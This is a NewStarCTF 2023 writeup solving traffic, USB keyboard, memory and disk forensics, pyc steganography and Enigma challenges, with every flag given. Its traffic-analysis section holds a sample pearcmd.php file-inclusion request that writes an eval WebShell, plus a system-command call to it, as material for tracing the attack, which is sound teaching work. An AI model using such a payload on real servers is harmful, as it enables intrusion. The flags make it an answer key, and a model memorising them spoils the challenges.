NewStarCTF 2023 Replay Writeup

WEEK3|MISC

2-Analysis

But you still have a bad feeling about it. At this point a colleague tells you that an attacker has already gained access to this server, and you need to reconstruct the attack path as quickly as possible and find out how the attacker obtained access.

Flag format: flag{md5(username the attacker logged in with_name of the vulnerable file_name of the WebShell file)}

For example, for flag{testuser_123.php_shell.php}, MD5-hash the content inside the braces to get flag{58aec571c731faae1369b461d3927596}, which is the flag to submit.

  • Topics: HTTP traffic analysis, basic attack tracing

  • FLAG:flag{4069afd7089f7363198d899385ad688b}

  • Solution

The flag is built from three pieces of information: the login username, the name of the vulnerable file, and the name of the WebShell that was written.

Login requests are almost always sent as POST, so start by filtering for POST requests only:

http && http.request.method == POST

One POST request, to /api/action/login.php, carries username and password fields:

image-20231108212816327

From this the login username is best_admin.

Next come the vulnerable file name and the WebShell name. There is a lot of directory-scanning traffic, so first use a Wireshark filter to drop every response whose status code is 404:

http && http.response.code != 404

Going through what remains, the response in frame 1267 stands out:

image-20231108213006677

This yields the other two pieces: the page parameter of index.php has an arbitrary file inclusion vulnerability. pearcmd.php is PEAR's command-line front end, and its config-create command writes its arguments into a file at a path the caller chooses, so including it through the LFI turns a file read into an arbitrary file write. The attacker used exactly that to write a WebShell named wh1t3g0d.php to the server.

The subsequent traffic shows the attacker using the wh1t3g0d.php shell to run system commands:

image-20231108213340402

So the plaintext of the flag is: best_admin_index.php_wh1t3g0d.php

MD5-hash the whole string and wrap it in flag{} to get the final flag: flag{4069afd7089f7363198d899385ad688b}
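The triage above can be scripted once the HTTP traffic is dumped to fields with tshark. The following Python is an added example, not code from the original writeup: it parses a field dump, drops request/response pairs answered with 404 (the scanner noise), pulls the login username from the POST body, recognises the pearcmd.php include together with the path it wrote, lists the requests sent to the resulting WebShell, and computes the flag hash. The records are constructed to mirror the challenge, the pearcmd URL is the generic form of the trick rather than the one in the capture, and pairing each request with the response row that follows it assumes a single client, as in this capture.

```python
import hashlib
import re
from urllib.parse import unquote, urlsplit

# Constructed sample, not the challenge capture. Each line mimics one row of
#   tshark -r cap.pcapng -Y http -T fields -E separator='|' \
#     -e frame.number -e http.request.method -e http.request.uri \
#     -e http.response.code -e http.file_data
# (real tshark field names; the frames themselves are invented).
SAMPLE = """\
12|GET|/robots.txt||
13|||404|
20|POST|/api/action/login.php||username=best_admin&password=Passw0rd!
21|||302|
40|GET|/admin.bak||
41|||404|
1266|GET|/index.php?+config-create+/&page=/usr/local/lib/php/pearcmd.php&/%3C%3F%3D@eval($_POST[1]);%3F%3E+/var/www/html/wh1t3g0d.php||
1267|||200|
1300|POST|/wh1t3g0d.php||1=system('id');
1301|||200|
"""


def parse_records(text):
    """Turn the field dump into dicts; response rows have an empty method."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        frame, method, uri, code, body = line.split("|", 4)
        records.append({"frame": int(frame), "method": method,
                        "uri": unquote(uri), "code": code, "body": body})
    return records


def drop_404_pairs(records):
    """Pair each request with the response row that follows it (assumes one
    client, as in the challenge capture) and drop scanner noise answered 404."""
    kept, i = [], 0
    while i < len(records):
        req = records[i]
        resp = records[i + 1] if i + 1 < len(records) else None
        if req["method"] and resp is not None and not resp["method"]:
            if resp["code"] != "404":
                kept.extend((req, resp))
            i += 2
        else:
            kept.append(req)
            i += 1
    return kept


def find_login_user(records):
    """Username from the first POST to a login endpoint whose body has username=."""
    for r in records:
        if r["method"] == "POST" and urlsplit(r["uri"]).path.endswith("login.php"):
            m = re.search(r"(?:^|&)username=([^&]+)", r["body"])
            if m:
                return m.group(1)
    return None


def find_pearcmd_write(records):
    """(vulnerable script, written file) for an include of pearcmd.php whose
    config-create argument list ends in the path it writes to."""
    for r in records:
        if not r["method"]:
            continue
        parts = urlsplit(r["uri"])
        if "pearcmd.php" not in parts.query:
            continue
        target = re.search(r"\+(/[^+&\s]+\.php)$", parts.query)
        if target:
            return parts.path.rsplit("/", 1)[-1], target.group(1).rsplit("/", 1)[-1]
    return None, None


def webshell_frames(records, shell_name):
    """Frames of every request aimed at the dropped WebShell."""
    return [r["frame"] for r in records
            if r["method"] and urlsplit(r["uri"]).path.endswith("/" + shell_name)]


def flag_for(username, vuln_file, shell_name):
    plain = f"{username}_{vuln_file}_{shell_name}"
    return "flag{" + hashlib.md5(plain.encode()).hexdigest() + "}"


def reconstruct(dump):
    records = drop_404_pairs(parse_records(dump))
    user = find_login_user(records)
    vuln, shell = find_pearcmd_write(records)
    return {
        "username": user, "vuln_file": vuln, "webshell": shell,
        "shell_frames": webshell_frames(records, shell) if shell else [],
        "flag": flag_for(user, vuln, shell) if user and vuln and shell else None,
    }


if __name__ == "__main__":
    for key, value in reconstruct(SAMPLE).items():
        print(f"{key}: {value}")
```

The URI is percent-decoded before matching because Wireshark shows the request line as sent, and the `<?=` of the payload usually arrives encoded; the pairing step is the scripted equivalent of the `!= 404` filter and should be replaced by following `http.response_in` links when several clients share the capture.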

Keyboard Warrior

If I were a keyboard warrior, how would you respond?

  • Topics: USB keyboard traffic analysis

  • FLAG:flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}

  • Solution

Opening the capture shows USB traffic; given the challenge name, it is most likely keyboard traffic. Use a Wireshark filter to keep only the packets coming from the keyboard device (1.15.1 is the device address in this capture; check the usb.src column for your own) and export them as res.pcapng:

usb.src == "1.15.1"

Use tshark to extract the HID report data and strip empty lines (newer Wireshark builds dissect HID interrupt reports as usbhid.data rather than usb.capdata; if the output is empty, use -e usbhid.data instead):

tshark -r res.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

Then run the following script to recover the keystrokes:

# HID usage ID (hex) -> character, for a US layout. 0x2b is Tab.
normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<TAB>","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"
}

# Same table with Shift held.
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<TAB>","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"
}

# Each line of usbdata.txt is one 8-byte boot-keyboard report written as 16 hex
# digits: byte 0 = modifier bitmap, byte 1 = reserved, bytes 2-7 = pressed keys.
nums = []
with open('usbdata.txt') as keys:
    for line in keys:
        if len(line) != 17:   # 16 hex digits + newline; colon-separated dumps need the colons removed first
            continue
        nums.append(line[0:2] + line[4:6])   # modifier byte + first key code

output = ""
for n in nums:
    if n[2:4] == "00":        # key-release report, nothing pressed
        continue
    if n[2:4] in normalKeys:
        if n[0:2] == "02":    # left Shift (0x02); right Shift would be 0x20
            output += shiftKeys[n[2:4]]
        else:
            output += normalKeys[n[2:4]]
    else:
        output += '[unknown]'
print('output :\n' + output)

which gives:

nw3lc0m3<SPACE>to<SPACE>newstar<SPACE>ctf<SPACE>2023<SPACE>flag<SPACE>is<SPACE>here<SPACE>vvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888<ESC><ESC>2hhxgbffffbbbnnat<CAP><CAP>ff<DEL>lll<DEL><DEL>aaa<DEL><DEL>gggg<DEL><DEL><DEL>{999<DEL><DEL>999<DEL><DEL>11<DEL>9aaa<DEL><DEL><SPACE><SPACE><DEL><DEL>eb2---<DEL><DEL>a450---<DEL><DEL>2f5f<SPACE><SPACE><SPACE><DEL><DEL><DEL>--<DEL>7bfc[unknown][unknown][unknown]-8989<DEL><DEL>dfdf<DEL><DEL>4bfa4bfa<DEL><DEL><DEL><DEL>85848584}}}<DEL><DEL><DEL><DEL><DEL><DEL><DEL>}]<SPACE><SPACE><SPACE><SPACE>nice<SPACE>work!1yyoou<SPACE>ggot<SPACE>tthhis<SPACE>fllag

<DEL> is Backspace (usage ID 0x2a) and <SPACE> is the space bar; replaying the sequence with each Backspace removing the character typed before it gives the flag:

flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}
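The last step, applying every <DEL> to the text typed before it, is tedious and error-prone by hand on a stream this long. The following Python is an added example, not part of the original writeup: it replays the decoded stream above as an editor buffer (Backspace removes the previous character, Caps Lock toggles letter case for later keys, Space/Return/Tab insert whitespace, every other control token is a no-op) and then pulls the flag{...} out of the result. Treating the three [unknown] keys as having no text effect is an assumption; with it, the replay reproduces the flag given above.

```python
import re

# Keystroke stream printed by the extraction script above (copied from the
# writeup, not constructed). <...> tokens are non-printing keys; [unknown]
# marks HID usage IDs missing from the lookup tables.
DECODED = (
    "nw3lc0m3<SPACE>to<SPACE>newstar<SPACE>ctf<SPACE>2023<SPACE>flag<SPACE>is<SPACE>here<SPACE>"
    "vvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888<ESC><ESC>"
    "2hhxgbffffbbbnnat<CAP><CAP>ff<DEL>lll<DEL><DEL>aaa<DEL><DEL>gggg<DEL><DEL><DEL>{999<DEL><DEL>"
    "999<DEL><DEL>11<DEL>9aaa<DEL><DEL><SPACE><SPACE><DEL><DEL>eb2---<DEL><DEL>a450---<DEL><DEL>"
    "2f5f<SPACE><SPACE><SPACE><DEL><DEL><DEL>--<DEL>7bfc[unknown][unknown][unknown]-8989<DEL><DEL>"
    "dfdf<DEL><DEL>4bfa4bfa<DEL><DEL><DEL><DEL>85848584}}}<DEL><DEL><DEL><DEL><DEL><DEL><DEL>}]"
    "<SPACE><SPACE><SPACE><SPACE>nice<SPACE>work!1yyoou<SPACE>ggot<SPACE>tthhis<SPACE>fllag"
)

# One token per key: a <...> control token, an [unknown] marker, or one character.
TOKEN = re.compile(r"<[^<>]+>|\[unknown\]|.")


def replay_edits(decoded):
    """Replay the key stream into an editor buffer and return the final text."""
    buf, caps = [], False
    for tok in TOKEN.findall(decoded):
        if tok == "<DEL>":                 # Backspace: drop the previous character
            if buf:
                buf.pop()
        elif tok == "<CAP>":               # Caps Lock toggles letter case for later keys
            caps = not caps
        elif tok == "<SPACE>":
            buf.append(" ")
        elif tok == "<RET>":
            buf.append("\n")
        elif tok == "<TAB>":
            buf.append("\t")
        elif tok.startswith("<") or tok == "[unknown]":
            continue                       # ESC, F-keys, GA/NON, unmapped codes: assumed no text effect
        else:
            buf.append(tok.swapcase() if caps and tok.isalpha() else tok)
    return "".join(buf)


def extract_flag(text):
    """First flag{...} in the replayed text, or None."""
    m = re.search(r"flag\{[^{}]*\}", text)
    return m.group(0) if m else None


if __name__ == "__main__":
    final_text = replay_edits(DECODED)
    print(final_text)
    print(extract_flag(final_text))
```

Arrow keys and mouse clicks would move the cursor and break the "Backspace deletes the last character" model; they do not occur in this stream, which is why a plain stack suffices here.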

WEEK4|MISC

First Forensics

  • Topics: memory forensics

  • FLAG:flag{a308067fc26625d31a421247adce3893}

  • Solution

Download the attachment and identify the image with Volatility:

volatility -f ./dycqz.raw imageinfo

Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/ye/Desktop/Web/dycqz.raw)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf8000403c070L
Number of Processors : 4
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff8000403dd00L
KPCR for CPU 1 : 0xfffff880009ee000L
KPCR for CPU 2 : 0xfffff88004568000L
KPCR for CPU 3 : 0xfffff880045dd000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2023-10-06 13:32:23 UTC+0000
Image local date and time : 2023-10-06 21:32:23 +0800

List the processes in memory, using the first suggested profile:

volatility -f ./dycqz.raw --profile=Win7SP1x64 pslist

image-20231108220405190

The list includes a notepad process; dump the text of its edit control with the editbox plugin:

volatility -f ./dycqz.raw --profile=Win7SP1x64 editbox

image-20231108220415340

This gives a ciphertext:

@iH<,{BTrI;(N[`j&z+xcj9XE2!u/YbR:4gb2+ceDJs@u6P

The `{` is outside both the base64 and the Ascii85 alphabets, which points at base91. base91 decoding gives: flag{a308067fc26625d31a421247adce3893}
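To show what the decoder is actually doing with that character set, the following Python is an added example (not from the writeup and not the base91 package): a self-contained basE91 decoder and encoder, using the standard 91-character alphabet and the 13/14-bit packing of Joachim Henke's original implementation. The ciphertext constant is the one recovered above; the encoder is included so the decoder can be checked by round-tripping arbitrary bytes.

```python
# Standard basE91 alphabet: the 94 printable non-space ASCII characters minus
# '-', '\' and the apostrophe. This is the published table, not data from the page.
ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
            "!#$%&()*+,./:;<=>?@[]^_`{|}~\"")
DECODE_TABLE = {c: i for i, c in enumerate(ALPHABET)}

# Ciphertext dumped from the notepad edit control above (from the writeup).
CIPHERTEXT = "@iH<,{BTrI;(N[`j&z+xcj9XE2!u/YbR:4gb2+ceDJs@u6P"


def b91decode(text):
    """Decode basE91: each character pair carries a value < 91*91 holding
    13 or 14 bits, chosen so the packing stays lossless."""
    out = bytearray()
    b = n = 0
    v = -1
    for ch in text:
        if ch not in DECODE_TABLE:
            continue                       # whitespace or stray characters are skipped
        if v < 0:
            v = DECODE_TABLE[ch]           # first character of a pair
            continue
        v += DECODE_TABLE[ch] * 91
        b |= v << n
        n += 13 if (v & 8191) > 88 else 14
        while n > 7:
            out.append(b & 255)
            b >>= 8
            n -= 8
        v = -1
    if v >= 0:                             # odd trailing character: remaining bits
        out.append((b | v << n) & 255)
    return bytes(out)


def b91encode(data):
    """Inverse of b91decode; used here to verify the decoder by round trip."""
    out = []
    b = n = 0
    for byte in data:
        b |= byte << n
        n += 8
        if n > 13:
            v = b & 8191
            if v > 88:                     # 13 bits suffice when the value is large enough
                b >>= 13
                n -= 13
            else:                          # otherwise take 14 bits (still < 91*91)
                v = b & 16383
                b >>= 14
                n -= 14
            out.append(ALPHABET[v % 91] + ALPHABET[v // 91])
    if n:
        out.append(ALPHABET[b % 91])
        if n > 7 or b > 90:
            out.append(ALPHABET[b // 91])
    return "".join(out)


if __name__ == "__main__":
    print(b91decode(CIPHERTEXT).decode(errors="replace"))
```

The 88 threshold is what distinguishes basE91 from a plain base-91 radix conversion: pairs whose low 13 bits exceed 88 only consume 13 bits, so the average is about 1.23 output characters per input byte.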

WEEK5|MISC

New Python File

  • Topics: pyc steganography (stegosaurus)

  • FLAG:flag{s0_b4By_pYcst3g}

  • Solution

Searching for pyc steganography quickly turns up the stegosaurus project: https://github.com/AngelKitty/stegosaurus

Note that this project has unusually strict environment requirements; run it under Python 3.6, most easily in a Docker container.

Extract the hidden payload directly:

python3 stegosaurus/stegosaurus.py -x flag.pyc

image-20231108220801131

ezhard

First disk forensics

  • Topics: disk forensics

  • Solution

The attachment turns out to be a disk image:

image-20231108234758191

Create a directory and mount the image there (read-only, so the evidence is not modified), then look for the flag in the mounted filesystem:

image-20231108234923416

image-20231108234942267

flag{12bc2ba3-fa54-7b45-7f3d-f54ea6e45d7c}

Enigma

Don't be a Sigma CTFer, be an Enigma CTFer. The flag consists of uppercase letters; wrap it in flag{} yourself.

from enigma.machine import EnigmaMachine
from secret import *

def enigma(m, _reflector, _rotors, _rs):
    machine = EnigmaMachine.from_key_sheet(
        rotors=_rotors,
        reflector=_reflector,
        ring_settings=_rs,
        plugboard_settings='')
    temp = machine.process_text(m)
    return temp.lower()

print(enigma(flag, reflector, rotors, [rs1,15,rs2]))
# uwdhwalkbuzwewhcaaepxnqsvfvkohskkspolrnswdfcbnn

The unknown parameters are the reflector, the rotor order, and the two outer ring settings rs1 and rs2; the middle ring setting is fixed at 15 and the plugboard is empty.

A quick look at the library (py-enigma, which provides enigma.machine) gives the value ranges of these parameters: reflectors B, C, B-Thin and C-Thin, rotors I to VIII, and 1-based ring settings from 1 to 26. The original script only tried the two thin reflectors, which happened to contain the answer; the brute force is:

from enigma.machine import EnigmaMachine

reflectors = ['B-Thin', 'C-Thin']
rotors = ['I', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII']
ciphertext = 'uwdhwalkbuzwewhcaaepxnqsvfvkohskkspolrnswdfcbnn'

for r1, r2, r3 in [(r1, r2, r3) for r1 in rotors for r2 in rotors for r3 in rotors]:
    for r in reflectors:
        # ring settings are 1-based in py-enigma, so the range must include 26
        for a, b in [(a, b) for a in range(1, 27) for b in range(1, 27)]:
            machine = EnigmaMachine.from_key_sheet(
                rotors=' '.join([r1, r2, r3]),
                reflector=r,
                ring_settings=[a, 15, b],   # middle ring setting is known from the source
                plugboard_settings='')
            temp = machine.process_text(ciphertext)
            if temp.startswith("FLAG"):
                print(temp, r1, r2, r3, r)
                break   # only leaves the innermost loop; the outer loops keep searching

Half a minute later we have the flag:

FLAGISENIGMAISSOOOINTERESTINGCRYPTODOYOUTHINKSO II IV VII C-Thin

Wrapping it in flag{} gives the flag: flag{ENIGMAISSOOOINTERESTINGCRYPTODOYOUTHINKSO}
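To make the parameter ranges above concrete, the following Python is an added example; it is neither the page's script nor py-enigma itself. It is a from-scratch three-rotor Enigma with the historical wirings and notches of rotors I to VIII, the B, C, B-Thin and C-Thin reflectors, 1-based ring settings and the same left-to-right argument order as EnigmaMachine.from_key_sheet, plus a brute_force helper with the shape of the search above (unknown reflector, rotor order and outer ring settings, middle ring fixed at 15). It reproduces the classic test vector (rotors I II III, reflector B, ring settings 1 1 1, window AAA: AAAAA encrypts to BDZGO) and the ADV to AEW to BFX double-step sequence. Exhausting the full search space of the challenge (2 reflectors, 8³ rotor orders, 26² ring pairs) with it takes minutes in CPython, so the optimized library remains the practical choice for the live search.

```python
from itertools import product

# Historical Enigma rotor wirings with their turnover notches, and the four
# reflectors py-enigma's from_key_sheet accepts. Standard tables, not taken
# from the writeup.
ROTORS = {
    "I":    ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":   ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III":  ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
    "IV":   ("ESOVPZJAYQUIRHXLNFTGKDCMWB", "J"),
    "V":    ("VZBRGITYUPSDNHLXAWMJQOFECK", "Z"),
    "VI":   ("JPGVOUMFYQBENHZRDKASXLICTW", "ZM"),
    "VII":  ("NZJHGRCXMYSWBOUFAIVLPEKQDT", "ZM"),
    "VIII": ("FKQHTLXOCBJSPDZRAMEWNIUYGV", "ZM"),
}
REFLECTORS = {
    "B": "YRUHQSLDPXNGOKMIEBFZCWVJAT",
    "C": "FVPJIAOYEDRZXWGCTKUQSBNMHL",
    "B-Thin": "ENKQAUYWJICOPBLMDXZVFTHRGS",
    "C-Thin": "RDOBJNTKVEHMLFCWZAXGYIPSUQ",
}


class Rotor:
    def __init__(self, name, ring_setting, window="A"):
        wiring, notches = ROTORS[name]
        self.fwd = [ord(c) - 65 for c in wiring]
        self.bwd = [0] * 26
        for i, o in enumerate(self.fwd):
            self.bwd[o] = i
        self.notches = {ord(c) - 65 for c in notches}
        self.ring = ring_setting - 1        # key sheets (and py-enigma) count ring settings from 1
        self.pos = ord(window) - 65

    def at_notch(self):
        return self.pos in self.notches     # the notch sits on the alphabet ring, so the ring setting is irrelevant

    def step(self):
        self.pos = (self.pos + 1) % 26

    def forward(self, c):
        shift = self.pos - self.ring
        return (self.fwd[(c + shift) % 26] - shift) % 26

    def backward(self, c):
        shift = self.pos - self.ring
        return (self.bwd[(c + shift) % 26] - shift) % 26


class Enigma:
    """Three-rotor machine; rotor names, ring settings and window letters are
    given left to right, as in EnigmaMachine.from_key_sheet."""

    def __init__(self, rotors, reflector, ring_settings, window="AAA", plugboard=""):
        self.left, self.mid, self.right = (
            Rotor(n, r, w) for n, r, w in zip(rotors, ring_settings, window))
        self.reflector = [ord(c) - 65 for c in REFLECTORS[reflector]]
        self.plug = list(range(26))
        for pair in plugboard.upper().split():
            a, b = ord(pair[0]) - 65, ord(pair[1]) - 65
            self.plug[a], self.plug[b] = b, a

    def _advance(self):
        # Rotors step before the current flows; a middle rotor sitting on its
        # notch carries the left rotor and itself (the "double step").
        if self.mid.at_notch():
            self.mid.step()
            self.left.step()
        elif self.right.at_notch():
            self.mid.step()
        self.right.step()

    def key_press(self, c):
        self._advance()
        c = self.plug[c]
        for rotor in (self.right, self.mid, self.left):
            c = rotor.forward(c)
        c = self.reflector[c]
        for rotor in (self.left, self.mid, self.right):
            c = rotor.backward(c)
        return self.plug[c]

    def process_text(self, text):
        return "".join(chr(self.key_press(ord(ch) - 65) + 65)
                       for ch in text.upper() if "A" <= ch <= "Z")


def brute_force(ciphertext, known_prefix, rotors, reflectors, middle_ring=15):
    """Same search shape as the page's script: every rotor order (repeats
    allowed, like the original loop), reflector and outer ring pair, with the
    middle ring fixed at the value leaked by the challenge source."""
    hits = []
    for order in product(rotors, repeat=3):
        for ref in reflectors:
            for a, b in product(range(1, 27), repeat=2):
                pt = Enigma(order, ref, [a, middle_ring, b]).process_text(ciphertext)
                if pt.startswith(known_prefix):
                    hits.append((pt, order, ref, (a, middle_ring, b)))
    return hits


if __name__ == "__main__":
    print(Enigma(["I", "II", "III"], "B", [1, 1, 1]).process_text("AAAAA"))  # BDZGO
```

Because every key press is an involution and stepping does not depend on the input, the same settings decrypt as well as encrypt, which is why the search simply runs the ciphertext through each candidate machine and looks for a readable prefix.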

Official writeups

NewStarCTF 2023 Week1 Official WriteUp
https://shimo.im/docs/XKq421EBKzFyRzAN/

NewStarCTF 2023 Week2 Official WriteUp
https://shimo.im/docs/Dy5ekHJhKo0ap5v3/

NewStarCTF 2023 Week3 Official WriteUp
https://shimo.im/docs/QPMRxzGktzsZnzhz

NewStarCTF 2023 Week4 Official WriteUp
https://shimo.im/docs/gXqmdVvbOEsXpo3o/

NewStarCTF 2023 Week5 Official WriteUp
https://shimo.im/docs/R3sGgZdrlyE6nL8T/